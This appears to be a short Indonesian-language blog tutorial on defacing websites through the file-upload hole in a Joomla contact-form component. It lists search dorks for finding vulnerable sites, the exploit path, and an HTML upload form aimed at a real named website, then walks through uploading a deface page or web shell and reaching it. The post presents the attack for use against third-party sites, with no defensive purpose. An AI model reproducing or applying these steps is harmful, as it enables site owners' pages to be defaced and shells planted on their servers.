Skip to main content

Deface Dengan Metode Com_Sexy

Image
By
Hai guys kali ini wa kasih tutor depes metode Com_Sexy :v Langsung simak aja dah :v
Bahan" : DORK

inurl:components/com_sexycontactfrom/
inurl:/com_sexycontactfrom/
(Kembangin lageh :v)
Exploit nya : /components/com_sexycontactfrom/fileupload/index.php
CSRF :

<form method="POST" action="http://bufetecristiani.com.mx/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

*Save dengan format html. Ganti Url nya dengan web yang mau di deface :v

1. Dorking pakek dork diatas
 
2. Kalo udah nentuin target, langsung masukin exploit diatas. Contoh site.co.li/components/com_sexycontactfrom/fileupload/index.php

3. Kalo kayak di bwah ini tandanya vuln. Langsung saja buka CSRF tadi.

4. Upload script deface/shell kalian

5. Kalo berhasil tandanya kek gini

6. Akses nya di site.co.li/components/com_sexycontactfrom/fileupload/files/namascript.html

Sekian tutorial dari ane :v
Apabila ada salah/kurang jelas mohon maap :v
Thanks ^.^
Labels:

Comments

Post a Comment